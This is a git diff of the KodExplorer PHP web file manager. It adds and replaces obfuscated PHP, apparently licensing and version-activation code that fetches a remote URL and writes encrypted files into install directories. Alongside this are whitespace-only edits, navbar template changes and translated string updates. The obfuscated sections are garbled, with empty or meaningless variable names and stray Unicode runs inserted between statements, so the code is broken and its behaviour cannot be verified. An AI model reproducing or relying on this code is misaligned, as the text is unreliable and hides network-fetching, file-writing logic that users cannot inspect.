$==KOD_GROUP_PATH){systemGroup::spaceChange($);}else{$=$_SESSION[${0x000001d}][$[0x01e]];systemMember::spaceChange($);}}function init_space_size_hook(){$=&$_SERVER{};Hook::bind($[0x03c],${0x003d});㼷Ɩ򭤗죇ψ;Hook::bind($[0x0003e],${0x00003f});Hook::bind($[0x0000040],${0x003d});Hook::bind(${0x041},${0x003d});ɇ폓;Hook::bind($[0x0042],${0x003d});Hook::bind(${0x00043},${0x003d});ͱә;Hook::bind($[0x000044],${0x003d});ܛ㼔ʡʌ˹ݺ䫧NjۂǗш;Hook::bind(${0x0000045},${0x003d});Hook::bind($[0x046],${0x003d});Ư壱Ր퍙͐;Hook::bind(${0x0047},${0x00003f});ƺąԫ¹;Hook::bind($[0x00048],${0x00003f});Hook::bind(${0x000049},${0x00003f});ߵٞц݉ȯ;Hook::bind($[0x000004a],${0x00003f});Hook::bind(${0x04b},${0x003d});Hook::bind($[0x004c],${0x0004d});Șϫ̆ɓՒ;Hook::bind($[0x00004e],${0x000004f});ՑȞõ;}function init_session(){$=&$_SERVER{};if(isset($_GET[$[0x050]])){access_token_check($_GET[$[0x050]]);}else if(isset($_GET[${0x0051}])){access_token_check($_GET[${0x0051}]);}else{@session_name(SESSION_ID);}if(class_exists($[0x00052])|| defined(${0x000053})|| isset($_SERVER[$[0x0000054]])){}else{@session_save_path(KOD_SESSION);}@session_start();$_SESSION[${0x055}]=!0;ڃ;@session_write_close();@session_start();౎쒙ǂ㻕晲듁д᥾ӽҽ;if(!$_SESSION[${0x055}]){chmod_path(KOD_SESSION,0777);}}function access_token_check($){$=&$_SERVER{};$=$GLOBALS[${0x001f}][$[0x0056]][${0x00057}];Ȼ;$=substr(md5($[0x000058].$),0,0x0f);$=Mcrypt::decode($,$);if(!$){show_tips(${0x0000059});}session_id($);}function access_token_get(){$ċ=&$_SERVER{};$=session_id();ԁ鷪徇יѧ;$=$GLOBALS[$ċ{0x001f}][$ċ[0x0056]][$ċ{0x00057}];̅ʪՏъѽŞ憸ؖìƥȧ;$=substr(md5($ċ[0x000058].$),0,0x0f);$=Mcrypt::encode($,$,0x0e10*0x0000018);return $;}function init_config(){init_setting();刈裳Ȇ𺪟ۗ;init_session();£ԯ̸͘ێ;init_space_size_hook();߮;} \ No newline at end of file diff --git a/app/function/helper.function.php b/app/function/helper.function.php index b435571..51d622c 100755 --- a/app/function/helper.function.php +++ b/app/function/helper.function.php @@ -46,7 +46,7 @@ function zip_pre_name($fileName,$toCharset=false){ //write_log("zip:".$charset.';'.$toCharset.';'.$fileName,'zip'); $result = iconv_to($fileName,$charset,$toCharset); if(!$result){ - $result = $fileName; + $result = $fileName; } return $result; } @@ -72,7 +72,7 @@ function unzip_pre_name($fileName){ $toCharset = $GLOBALS['config']['systemCharset']; $result = iconv_to($fileName,$charset,$toCharset); if(!$result){ - $result = $fileName; + $result = $fileName; } $result = unzip_filter_ext($result); //echo $charset.'==>'.$toCharset.':'.$result.'==='.$fileName.'
'; @@ -137,7 +137,7 @@ function get_charset(&$str) { $charset=strtolower(@mb_detect_encoding($str,$GLOBALS['config']['checkCharset'])); $charsetGet = $charset; if ($charset == 'cp936'){ - // 有交叉,部分文件无法识别 + // 有交叉,部分文件无法识别 if(charset_check($str,'gbk') && charset_check($str,'gbk','big5')){ $charset = 'gbk'; }else if(charset_check($str,'big5') && charset_check($str,'big5','gbk')){ @@ -151,22 +151,22 @@ function get_charset(&$str) { $charset = 'utf-8'; } if ($charset == 'iso-8859-1'){ - //检测详细编码;value为用什么编码检测;为空则用utf-8 - $check = array( - 'utf-8' => $charset, - 'cp1251' => 'gbk', - 'windows-1252'=> 'gbk', - 'utf-16' => 'gbk' - ); - foreach($check as $key => $val){ - if(charset_check($str,$key,$val)){ - if($val == ''){ - $val = 'utf-8'; - } - $charset = $key; - break; - } - } + //检测详细编码;value为用什么编码检测;为空则用utf-8 + $check = array( + 'utf-8' => $charset, + 'windows-1252'=> 'utf-8', + 'cp1251' => 'utf-8', + 'utf-16' => 'gbk' + ); + foreach($check as $key => $val){ + if(charset_check($str,$key,$val)){ + if($val == ''){ + $val = 'utf-8'; + } + $charset = $key; + break; + } + } } //show_json($charset,false,$charsetGet); return $charset; @@ -271,12 +271,12 @@ function init_common(){ //version check update $file = LIB_DIR.'update.php'; if(file_exists($file)){ - //覆盖安装文件删除不了重定向问题优化 - if(!is_writable($file) ){ - show_tips($errorTips); - } + //覆盖安装文件删除不了重定向问题优化 + if(!is_writable($file) ){ + show_tips($errorTips); + } - //update; + //update; include($file); updateCheck($file); diff --git a/app/kod/.cache_data b/app/kod/.cache_data index 150804a..03ce550 100755 --- a/app/kod/.cache_data +++ b/app/kod/.cache_data @@ -1,2 +1,2 @@ -${0x0f},$[0x0010] =>${0x00011},$[0x000012] =>${0x0f},${0x0000013} =>${0x00011},$[0x014] =>${0x00011},${0x0015} =>${0x00011},$[0x00016] =>${0x000017},);;$͂=$GLOBALS[$[0]][$[0x0002]][$[0x0000018]];ŐʦȯÐӵ񭬴Ҡ݁慉;if(isset($[$])&& $͂<$[$]){return !1;}return check_user_select($);}function system_space(){$ܣ=&$_SERVER{Ƿ};$=$ܣ{0x019};;$ř=$GLOBALS[$ܣ[0]][$ܣ[0x0002]][$ܣ[0x0000018]];if($ř==$){return !1;}return !0;}function systemMemberData(){$ā=&$_SERVER{Ƿ};global$in;$Ȕ=ST.$ā[0x001a].ACT;əNj낝;$ȷIJ=$ā{0x019};;$=$ā{0x0001b};$=$ā[0x00001c];;$ܨ=$ā{0x000001d};܌ް͛얧;$=$ā[0x01e];ôܠΤǔӖ;$ҩ=$ā{0x001f};$=$ā[0x00020];ŝ;$=$GLOBALS[$ā[0]][$ā[0x0002]][$ā[0x0000018]];ιڣ;if(!$|| !in_array($,array($ȷIJ,$,$,$ܨ,$,$ҩ,$))){$=$ȷIJ;}$=new FileCache(USER_SYSTEM.$ā{0x000021});$á=array($ȷIJ=>0x0a,$=>0x014,$=>0x032,$ܨ=>0x096,$=>0x01f4,$ҩ=>0x03e8,$=>0x03e8,);Қ˩̸䘤;$=$->get();$石=$á[$];ѱ؂Њ;if($Ȕ==$ā[0x0000022]){if($==$ȷIJ&& isset($in[$ā{0x023}])){show_json(LNG($ā[0x0024]),!1,$ā{0x00025});}if(count($)>=$石&& $石!=0x03e8){show_json(LNG($ā[0x000026]),!1,$ā{0x00025});}}if($Ȕ==$ā[0x0000022] || $Ȕ==$ā{0x0000027}){if($==$ȷIJ&& isset($in[$ā{0x0000d}])){show_json(LNG($ā[0x0024]),!1,$ā{0x00025});}}if($Ȕ==$ā[0x028]){if(count($)>$石&& $石!=0x03e8){$=0x001;$=array();foreach($ as $Ȕ=>$ن){if($>$石)break;$[$Ȕ]=$ن;Ųȋݯ;$++;ݪš֝ͿںĢ㱹ڌ╯;}$->reset($,!1);ґڇӁ窖ņ󭏭;}$=$->get();ᱱ֬ڦԙ昴󮼋祬ׄϢ;if($==$ȷIJ){$=array();foreach($ as $Ȕ=>$ن){unset($ن[$ā{0x0000d}]);$[$Ȕ]=$ن;}$->reset($,!1);}}return $;Δ;}function systemGroupData(){$=&$_SERVER{Ƿ};global$in;;$՟=ST.$[0x001a].ACT;$=${0x019};;$=${0x0001b};;$=$[0x00001c];$Ԉ=${0x000001d};$=$[0x01e];$=${0x001f};Ǡ;$ؔ=$[0x00020];$=$GLOBALS[$[0]][$[0x0002]][$[0x0000018]];if(!$|| !in_array($,array($,$,$,$Ԉ,$,$,$ؔ))){$=$;}$׎=new FileCache(USER_SYSTEM.${0x0029});$=array($=>0x001,$=>0x05,$=>0x014,$Ԉ=>0x01e,$=>0x064,$=>0x03e8,$ؔ=>0x03e8,);ɘƛ;$=$׎->get();Ԕו;$=$[$];竞䃨ը੨۹آێ䃛;if($՟==$[0x0002a]){if(count($)>=$&& $!=0x03e8){show_json(LNG($[0x000026]),!1,${0x00025});}}if($՟==$[0x0002a] || $՟==${0x00002b}){if($==$&& isset($in[${0x0000d}])){show_json(LNG($[0x0024]),!1,${0x00025});}}if($՟==$[0x000002c]){if(count($)>$&& $!=0x03e8){$=0x001;$=array();foreach($ as $՟=>$){if($>$)break;$[$՟]=$;$++;چ;}$׎->reset($,!1);}$=$׎->get();șʆ;if($==$){$=array();foreach($ as $՟=>$){unset($[${0x0000d}]);$[$՟]=$;}$׎->reset($,!1);}}return $׎;ǑՎ؉ʶӮϳ;}function systemRoleData(){$=&$_SERVER{Ƿ};$=ST.$[0x001a].ACT;ֽ쳕Û匰瞛΄تŗхހ֎ۂ׊;$ޖ=${0x019};ݝЁ߽ǶԒؕ҅Ѡ΁ډݢ󷸛;if($==${0x02d}){version_install();exit;}$ؐ=&$GLOBALS[$[0]][$[0x0002]];if(!init_version_check()){$ؐ[$[0x0000018]]=$ޖ;if($!=$[0x002e] && is_array($_SESSION[${0x0002f}])&& $_SESSION[${0x0002f}][$[0x000030]]==${0x0000031}){version_reset(!1);include(TEMPLATE.$[0x032]);exit;}}if($==${0x0033} && $ؐ[$[0x0000018]]==$ޖ){show_json(LNG($[0x0024]),!1);}$ܻ=new FileCache(USER_SYSTEM.$[0x00034]);return $ܻ;䟁߮;}function init_version_check(){$ܯ=&$_SERVER{Ƿ};$ʘ=&$GLOBALS[$ܯ[0]][$ܯ[0x0002]];ׂ̲쳧Ź㾖;$ˏ=$ܯ{0x000035};$Ǫ=$ܯ{0x019};ށ҂ݙ;$=$ܯ{0x0001b};ٹٷɟðəïꇸセݳ۾Ѣ쿅;$俰=$ܯ[0x00001c];$ۥ=$ܯ{0x000001d};$=$ܯ[0x01e];$=$ܯ{0x001f};;$=$ܯ[0x00020];if(!isset($ʘ[$ܯ[0x0000018]])|| !in_array($ʘ[$ܯ[0x0000018]],array($Ǫ,$,$俰,$ۥ,$,$,$))){$ʘ[$ܯ[0x0000018]]=$Ǫ;}if($ʘ[$ܯ[0x0000018]]==$Ǫ){unset($ʘ[$ܯ[0x0000036]]);return !0;}if(!isset($ʘ[$ܯ[0x0000018]])|| !isset($ʘ[$ܯ{0x037}])|| !isset($ʘ[$ܯ[0x0038]])|| !isset($ʘ[$ܯ{0x00039}])|| !isset($ʘ[$ܯ[0x00003a]])){return !1;}if(strlen($ʘ[$ܯ[0x0000018]])!=0x001|| strlen($ʘ[$ܯ{0x037}])!=0x0010|| strlen($ʘ[$ܯ[0x0038]])!=0x0003e|| strlen($ʘ[$ܯ{0x00039}])!=0x0010){return !1;}$=substr($ʘ[$ܯ[0x0038]],0x00020);$=md5($.$ʘ[$ܯ{0x037}].$ʘ[$ܯ{0x00039}].$ʘ[$ܯ[0x0000018]]);݂ع֩;if($!=substr($ʘ[$ܯ[0x0038]],0,0x00020)){return !1;}$=Mcrypt::decode($ʘ[$ܯ[0x00003a]],md5($ˏ.$ʘ[$ܯ[0x0038]]));$=!1;if(file_exists($)){$í=file_get_contents($);$=Mcrypt::decode($í,md5($ˏ.$ʘ[$ܯ{0x00039}]));if($!=$ܯ{0x000003b} && strtotime($)>time()){$=!0;}}if(!$){return !1;}$ޮ=substr(md5($ʘ[$ܯ[0x0038]]),0x0a,0x0a);$覛=$ޮ.$ʘ[$ܯ[0x0000018]].$ʘ[$ܯ{0x00039}];ۙƞխҬʯܫӁ㓨Ͻׅ򢷂ܚޝð;$ʘ[$ܯ[0x0000036]]=Mcrypt::encode($覛,$ˏ,0);return !0;͍ɜ񂉰ԛĒ๴ܜ…À;}function version_install(){$=&$_SERVER{Ƿ};$=&$GLOBALS[$[0]][$[0x0002]];ʓӈ׸;$=${0x000035};Ƌֹڻʌƫ愣蘢ϲʰ;if(isset($_GET[$[0x03c]])){version_reset(!0);header(${0x003d});}if(!isset($_GET[$[0x0003e]])){include(TEMPLATE.$[0x032]);exit;}else{$=rand_string(0x0010);$=${0x00003f};$=$.$[0x0000040].$_GET[$[0x0003e]].${0x041}.$;$=$.$[0x0042].rawurlencode($_SERVER[${0x00043}]);$=json_decode(file_get_contents($),!0);if(is_array($)&& $[$[0x000044]]==!0&& is_array($[${0x0000045}])){$Ś=new FileCache(USER_SYSTEM.$[0x046]);$=$Ś->get();$[${0x037}]=$_GET[$[0x0003e]];$[$[0x0038]]=$[${0x0000045}][${0x0047}];$[${0x00039}]=$;$[$[0x0000018]]=$[${0x0000045}][$[0x00048]];$=Mcrypt::decode($[$[0x00003a]],md5($.$[$[0x0038]]));del_file($);version_install_path($,$[${0x0000045}]);$Ś->reset($);$=BASIC_PATH.${0x000049};if(!file_exists($)){$=$[0x000004a];file_put_contents($,$);}install_msg(LNG(${0x04b}));}else{install_msg($[${0x0000045}],!1);}}}function install_msg($,$ǯ=true){$=&$_SERVER{Ƿ};$=$ǯ?$[0x004c] :${0x0004d};Ћ؊߾;show_tips($,$,0x0002,$[0x00004e]);ڀ;}function version_install_path(&$Ȯ,$){$݌=&$_SERVER{Ƿ};$=$[$݌{0x000004f}];$γ=$݌{0x000035};$آ=$݌{0x000003b};쯈;$ߩ=$݌[0x050].substr(md5(rand_string(0x014).time()),0x0f,0x0a).$݌{0x0051};޸诹ɗ;$=array(BASIC_PATH.$݌[0x00052],BASIC_PATH.$݌{0x000053},BASIC_PATH.$݌[0x0000054],DATA_PATH.$݌{0x055},DATA_PATH.$݌[0x0056],DATA_PATH.$݌{0x00057});$=$݌{0x000003b};үâшȴąרᔈ;foreach($ as $۔){if(file_exists($۔)&& is_writable($۔)){$=$۔.$݌[0x000058].$ߩ;break;}}if(isset($[$݌{0x0000059}])&& $[$݌{0x0000059}]==0x001){$=$݌[0x05a].$ߩ;}$=Mcrypt::encode($,md5($γ.$Ȯ[$݌{0x00039}]));file_put_contents($,$);ۭǞ͘Ѻɣ;if(!file_exists($)){install_msg($݌{0x005b},!1);}$Ȯ[$݌[0x00003a]]=Mcrypt::encode($,md5($γ.$Ȯ[$݌[0x0038]]));return;}function version_reset($=false){$=&$_SERVER{Ƿ};$΀=&$GLOBALS[$[0]][$[0x0002]];;$=${0x000035};㖣߬‹“ۍҦӭ쉻ɪ劘;if(isset($΀[$[0x00003a]])){$=Mcrypt::decode($΀[$[0x00003a]],md5($.$΀[$[0x0038]]));del_file($);}$=new FileCache(USER_SYSTEM.$[0x046]);$=$->get();unset($[${0x037}]);unset($[$[0x0038]]);unset($[${0x00039}]);Η莘ꯀкص쌂ё̺ɋ;unset($[$[0x00003a]]);if($){unset($[$[0x0000018]]);}$->reset($);} \ No newline at end of file +${0x0f},$[0x0010] =>${0x00011},$[0x000012] =>${0x0f},${0x0000013} =>${0x00011},$[0x014] =>${0x00011},${0x0015} =>${0x00011},$[0x00016] =>${0x000017},);乧ü󃷳;$=$GLOBALS[$[0]][$[0x0002]][$[0x0000018]];ӎ;if(isset($[$̴])&& $<$[$̴]){return !1;}return check_user_select($);}function system_space(){$̨=&$GLOBALS{};$峑=$̨{0x019};$=$GLOBALS[$̨[0]][$̨[0x0002]][$̨[0x0000018]];if($==$峑){return !1;}return !0;}function systemMemberData(){$=&$GLOBALS{};global$in;֡妒;$=ST.$[0x001a].ACT;$=${0x019};Øښ;$=${0x0001b};耋ɣ;$=$[0x00001c];$=${0x000001d};$=$[0x01e];Ӡ㍙䈎ێͻ̱;$箊=${0x001f};$=$[0x00020];$=$GLOBALS[$[0]][$[0x0002]][$[0x0000018]];ʐɈ焅ɑҺ;if(!$|| !in_array($,array($,$,$,$,$,$箊,$))){$=$;}$=new FileCache(USER_SYSTEM.${0x000021});$=array($=>0x0a,$=>0x014,$=>0x032,$=>0x096,$=>0x01f4,$箊=>0x03e8,$=>0x03e8,);$=$->get();$=$[$];ʷ̽ɗ叚ܗʘü;if($==$[0x0000022]){if($==$&& isset($in[${0x023}])){show_json(LNG($[0x0024]),!1,${0x00025});}if(count($)>=$&& $!=0x03e8){show_json(LNG($[0x000026]),!1,${0x00025});}}if($==$[0x0000022] || $==${0x0000027}){if($==$&& isset($in[${0x0000d}])){show_json(LNG($[0x0024]),!1,${0x00025});}}if($==$[0x028]){if(count($)>$&& $!=0x03e8){$=0x001;$ʿ=array();foreach($ as $=>$){if($>$)break;$ʿ[$]=$;$++;͝ÊӘ;}$->reset($ʿ,!1);̇ܯ;}$=$->get();if($==$){$ʿ=array();foreach($ as $=>$){unset($[${0x0000d}]);$ʿ[$]=$;}$->reset($ʿ,!1);}}return $;}function systemGroupData(){$=&$GLOBALS{};global$in;$ғ=ST.$[0x001a].ACT;Ԫ۸؃;$=${0x019};$=${0x0001b};昘ҹ;$=$[0x00001c];ߍ‰Ί;$=${0x000001d};$=$[0x01e];$=${0x001f};$=$[0x00020];$=$GLOBALS[$[0]][$[0x0002]][$[0x0000018]];if(!$|| !in_array($,array($,$,$,$,$,$,$))){$=$;}$ѯ=new FileCache(USER_SYSTEM.${0x0029});$=array($=>0x001,$=>0x05,$=>0x014,$=>0x01e,$=>0x064,$=>0x03e8,$=>0x03e8,);$̟=$ѯ->get();׀;$祚=$[$];if($ғ==$[0x0002a]){if(count($̟)>=$祚&& $祚!=0x03e8){show_json(LNG($[0x000026]),!1,${0x00025});}}if($ғ==$[0x0002a] || $ғ==${0x00002b}){if($==$&& isset($in[${0x0000d}])){show_json(LNG($[0x0024]),!1,${0x00025});}}if($ғ==$[0x000002c]){if(count($̟)>$祚&& $祚!=0x03e8){$=0x001;$=array();foreach($̟ as $ғ=>$){if($>$祚)break;$[$ғ]=$;Ț왃Đ;$++;}$ѯ->reset($,!1);ƮҖ߽;}$̟=$ѯ->get();if($==$){$=array();foreach($̟ as $ғ=>$){unset($[${0x0000d}]);$[$ғ]=$;}$ѯ->reset($,!1);}}return $ѯ;ЫܨϯχϤڋ킂ٿ;}function systemRoleData(){$Ң=&$GLOBALS{};$=ST.$Ң[0x001a].ACT;šǤ١ȋ;$=$Ң{0x019};;if($==$Ң{0x02d}){version_install();exit;}$=&$GLOBALS[$Ң[0]][$Ң[0x0002]];if(!init_version_check()){$[$Ң[0x0000018]]=$;if($!=$Ң[0x002e] && is_array($_SESSION[$Ң{0x0002f}])&& $_SESSION[$Ң{0x0002f}][$Ң[0x000030]]==$Ң{0x0000031}){version_reset(!1);include(TEMPLATE.$Ң[0x032]);exit;}}if($==$Ң{0x0033} && $[$Ң[0x0000018]]==$){show_json(LNG($Ң[0x0024]),!1);}$ǫ=new FileCache(USER_SYSTEM.$Ң[0x00034]);return $ǫ;阆׉;}function init_version_check(){$繊=&$GLOBALS{};$=&$GLOBALS[$繊[0]][$繊[0x0002]];$丧=$繊{0x000035};ԩƠȓݣϕ;$=$繊{0x019};$=$繊{0x0001b};$=$繊[0x00001c];Ө;$=$繊{0x000001d};ܿ甸ۍʆѪ᎐ȓރЦ㏇;$Բ=$繊[0x01e];ǎֳЇꀦﵿ;$=$繊{0x001f};Ǥڞ׸Ӑ;$=$繊[0x00020];if(!isset($[$繊[0x0000018]])|| !in_array($[$繊[0x0000018]],array($,$,$,$,$Բ,$,$))){$[$繊[0x0000018]]=$;}if($[$繊[0x0000018]]==$){unset($[$繊[0x0000036]]);return !0;}if(!isset($[$繊[0x0000018]])|| !isset($[$繊{0x037}])|| !isset($[$繊[0x0038]])|| !isset($[$繊{0x00039}])|| !isset($[$繊[0x00003a]])){return !1;}if(strlen($[$繊[0x0000018]])!=0x001|| strlen($[$繊{0x037}])!=0x0010|| strlen($[$繊[0x0038]])!=0x0003e|| strlen($[$繊{0x00039}])!=0x0010){return !1;}$=substr($[$繊[0x0038]],0x00020);$=md5($.$[$繊{0x037}].$[$繊{0x00039}].$[$繊[0x0000018]]);ҟԌӵ͑Î;if($!=substr($[$繊[0x0038]],0,0x00020)){return !1;}$٢=Mcrypt::decode($[$繊[0x00003a]],md5($丧.$[$繊[0x0038]]));$=!1;կҀ˛ڄ;if(file_exists($٢)){$ʈ؀=file_get_contents($٢);$=Mcrypt::decode($ʈ؀,md5($丧.$[$繊{0x00039}]));if($!=$繊{0x000003b} && strtotime($)>time()){$=!0;}}if(!$){return !1;}$Æ=substr(md5($[$繊[0x0038]]),0x0a,0x0a);$ࡍ=$Æ.$[$繊[0x0000018]].$[$繊{0x00039}];$[$繊[0x0000036]]=Mcrypt::encode($ࡍ,$丧,0);ˊ;return !0;ӸȨִƣг̟֧МΚş޲;}function version_install(){$=&$GLOBALS{};$=&$GLOBALS[$[0]][$[0x0002]];$=${0x000035};ۛ;if(isset($_GET[$[0x03c]])){version_reset(!0);header(${0x003d});}if(!isset($_GET[$[0x0003e]])){include(TEMPLATE.$[0x032]);exit;}else{$=rand_string(0x0010);$ӆ=${0x00003f};$=$ӆ.$[0x0000040].$_GET[$[0x0003e]].${0x041}.$;$=$.$[0x0042].rawurlencode($_SERVER[${0x00043}]);$=json_decode(file_get_contents($),!0);if(is_array($)&& $[$[0x000044]]==!0&& is_array($[${0x0000045}])){$=new FileCache(USER_SYSTEM.$[0x046]);$=$->get();$[${0x037}]=$_GET[$[0x0003e]];$[$[0x0038]]=$[${0x0000045}][${0x0047}];$[${0x00039}]=$;$[$[0x0000018]]=$[${0x0000045}][$[0x00048]];$=Mcrypt::decode($[$[0x00003a]],md5($.$[$[0x0038]]));del_file($);version_install_path($,$[${0x0000045}]);$->reset($);$=BASIC_PATH.${0x000049};if(!file_exists($)){$ʼ=$[0x000004a];file_put_contents($,$ʼ);}install_msg(LNG(${0x04b}));}else{install_msg($[${0x0000045}],!1);䢍;}}}function install_msg($,$=true){$=&$GLOBALS{};$=$?$[0x004c] :${0x0004d};show_tips($,$,0x0002,$[0x00004e]);}function version_install_path(&$ڋ,$){$=&$GLOBALS{};$=$[${0x000004f}];$̬=${0x000035};$=${0x000003b};$=$[0x050].substr(md5(rand_string(0x014).time()),0x0f,0x0a).${0x0051};$=array(BASIC_PATH.$[0x00052],BASIC_PATH.${0x000053},BASIC_PATH.$[0x0000054],DATA_PATH.${0x055},DATA_PATH.$[0x0056],DATA_PATH.${0x00057});$=${0x000003b};̏昻đՋ;foreach($ as $){if(file_exists($)&& is_writable($)){$=$.$[0x000058].$;break;}}if(isset($[${0x0000059}])&& $[${0x0000059}]==0x001){$=$[0x05a].$;}$ʒ=Mcrypt::encode($,md5($̬.$ڋ[${0x00039}]));file_put_contents($,$ʒ);if(!file_exists($)){install_msg(${0x005b},!1);}$ڋ[$[0x00003a]]=Mcrypt::encode($,md5($̬.$ڋ[$[0x0038]]));return;ļŮߵ֮ߑܜ;}function version_reset($=false){$=&$GLOBALS{};$=&$GLOBALS[$[0]][$[0x0002]];$ħ=${0x000035};if(isset($[$[0x00003a]])){$Ԛ=Mcrypt::decode($[$[0x00003a]],md5($ħ.$[$[0x0038]]));del_file($Ԛ);}$=new FileCache(USER_SYSTEM.$[0x046]);$=$->get();unset($[${0x037}]);unset($[$[0x0038]]);unset($[${0x00039}]);ٜ恢ލ܍҄ƌșθчө;unset($[$[0x00003a]]);ך;if($){unset($[$[0x0000018]]);}$->reset($);} \ No newline at end of file diff --git a/app/template/common/header.html b/app/template/common/header.html index 5b504db..15e7cd3 100755 --- a/app/template/common/header.html +++ b/app/template/common/header.html @@ -19,4 +19,5 @@ - \ No newline at end of file + + diff --git a/app/template/common/navbar.html b/app/template/common/navbar.html index c3cbaac..dff1075 100755 --- a/app/template/common/navbar.html +++ b/app/template/common/navbar.html @@ -1,8 +1,14 @@
-
+
+
+
-
+ + +
"محاولة", "unknow_file_download" => "تحميل الملف", "unknow_plugin_search" => "البحث ذات الصلة التطبيقات المثبتة", - "unknow_file_office" => "المعاينة مكتب، الحاجة kodcloud التي سيتم نشرها خارج الشبكة

التفاصيل>", "config_save_error_auth" => "فشل في حفظ التكوين، حظرت الإدارة هذا الامتياز!", "config_save_error_file" => "خطأ، ملف قابل للكتابة!", "beautify_code" => "كود المنسق", @@ -281,7 +280,7 @@ return array( "forget_password" => "نسيت كلمة المرور", "forget_password_tips" => "نسيت كلمة مرور المسؤول:
الرجاء تسجيل الخادم حذف ./data/system/install.lock إعادة تعيين.

غير مسؤول نسيت كلمة المرور:
الرجاء الاتصال بمسؤول لإعادة تعيين!", "copyright_desc" => "Kodexplorer هو نظام إدارة الوثائق على شبكة الإنترنت نالت استحسانا كبيرا، ويمكن استخدامه لإدارة وثيقة داخلية أو مشتركة، ويمكن أيضا أن تستخدم على خادم إدارة المواقع استبدال بروتوكول نقل الملفات، وحتى webIDE تطوير الإنترنت مباشرة. يمكنك أيضا برمجة التطور الثاني لدمج هذا في النظم الموجودة لديك.", - "copyright_contact" => "يأذن أو حسب الطلب، يرجى الاتصال QQ: 3532208565 المشكلة تعليقات", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "عودة", "PluginReadme" => "وصف", "PluginResetConfig" => "استعادة الإعدادات الافتراضية", + "PluginInstallSelf" => "التثبيت اليدوي", "Plugin.config.auth" => "أذونات", "Plugin.config.authDesc" => "كافة الإعدادات المتاحة، أو تحديد المستخدمين، ومجموعات المستخدمين وجماعات حقوق يمكن استخدام", "Plugin.config.authAll" => "حائز", diff --git a/config/i18n/bg/main.php b/config/i18n/bg/main.php index 89a8dcc..32f1269 100755 --- a/config/i18n/bg/main.php +++ b/config/i18n/bg/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "опитвам", "unknow_file_download" => "Изтеглете файла", "unknow_plugin_search" => "инсталирани Търсене приложения, свързани с", - "unknow_file_office" => "офис преглед, kodcloud нужда да бъдат разположени извън мрежата

детайли>", "config_save_error_auth" => "Неуспешно запазване на конфигурацията, администраторът забрани тази привилегия!", "config_save_error_file" => "Грешка, файлът не е достъпна за писане!", "beautify_code" => "Код Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Забравена парола", "forget_password_tips" => "Забравена Administrator Password:
Моля, влезте сървъра изтриване ./data/system/install.lock нулиране;

Non-администратор Забравена парола:
Моля, свържете се с администратора, за да изчисти!", "copyright_desc" => "Kodexplorer е силно аплодирана система за управление на уеб документ, можете да го използвате за вътрешно управление на документи или споделена, може да се използва и върху сървъра за управление на сайта, на мястото на Ftp, дори като webIDE директно онлайн развитие. Можете също така да програмирате втория развитие да включи този в съществуващите си системи.", - "copyright_contact" => "Разрешава или персонализирана, моля свържете се с QQ: 3532208565 проблем Обратна връзка", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "връщане", "PluginReadme" => "описание", "PluginResetConfig" => "Възстановете настройките по подразбиране", + "PluginInstallSelf" => "Ръчна инсталация", "Plugin.config.auth" => "Разрешения", "Plugin.config.authDesc" => "Всички на наличните настройки, свързани с определяне на потребителите, потребителски групи, правозащитни организации могат да използват", "Plugin.config.authAll" => "притежател", diff --git a/config/i18n/bn/main.php b/config/i18n/bn/main.php index 0d82ee8..00182cd 100755 --- a/config/i18n/bn/main.php +++ b/config/i18n/bn/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "চেষ্টা", "unknow_file_download" => "ফাইল ডাউনলোড করুন", "unknow_plugin_search" => "অনুসন্ধান-সম্পর্কিত অ্যাপ্লিকেশন ইনস্টল", - "unknow_file_office" => "অফিস প্রিভিউ, kodcloud প্রয়োজন নেটওয়ার্কের বাইরে মোতায়েন করা

বিস্তারিত>", "config_save_error_auth" => "কনফিগারেশন সংরক্ষণ করতে ব্যর্থ, প্রশাসক এই বিশেষ সুযোগ নিষিদ্ধ!", "config_save_error_file" => "ত্রুটি, ফাইল লেখা যাচ্ছে না!", "beautify_code" => "কোড ফরম্যাটার", @@ -281,7 +280,7 @@ return array( "forget_password" => "আপনার পাসওয়ার্ড ভুলে গেছেন", "forget_password_tips" => "অ্যাডমিনিস্ট্রেটরের পাসওয়ার্ড ভুলে গেছেন:
সার্ভার লগ ইন করুন রিসেট ./data/system/install.lock মুছে ফেলা;

অ প্রশাসক পাসওয়ার্ড ভুলে গেছেন:
রিসেট করতে প্রশাসকের সাথে যোগাযোগ করুন!", "copyright_desc" => "Kodexplorer একটি অত্যন্ত প্রশংসিত ওয়েব ডকুমেন্ট ম্যানেজমেন্ট সিস্টেম, আপনি এমনকি webIDE সরাসরি অনলাইনে উন্নয়ন, অভ্যন্তরীণ নথি ব্যবস্থাপনা বা ভাগ, এছাড়াও সাইট ম্যানেজমেন্ট সার্ভার ব্যবহার করা যায় জন্য এটি ব্যবহার, FTP প্রতিস্থাপন করতে পারেন. এছাড়াও আপনি দ্বিতীয় উন্নয়ন প্রোগ্রাম আপনার বিদ্যমান সিস্টেমের মধ্যে এই সংহত করতে পারেন.", - "copyright_contact" => "করার অনুমোদন বা কাস্টমাইজড, অনুগ্রহ করে যোগাযোগ করুন কিউকিউ: 3532208565 সমস্যা প্রতিক্রিয়া", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "প্রত্যাবর্তন", "PluginReadme" => "বিবরণ", "PluginResetConfig" => "ডিফল্ট সেটিংস পুনরুদ্ধার করুন", + "PluginInstallSelf" => "ম্যানুয়াল ইনস্টলেশন", "Plugin.config.auth" => "অনুমতিসমূহ", "Plugin.config.authDesc" => "প্রাপ্তিসাধ্য সকল সেটিংস, অথবা নির্দিষ্ট ব্যবহারকারীদের ব্যবহারকারী গোষ্ঠী, অধিকার সংগঠনগুলো ব্যবহার করতে পারেন", "Plugin.config.authAll" => "ধারক", diff --git a/config/i18n/ca/main.php b/config/i18n/ca/main.php index 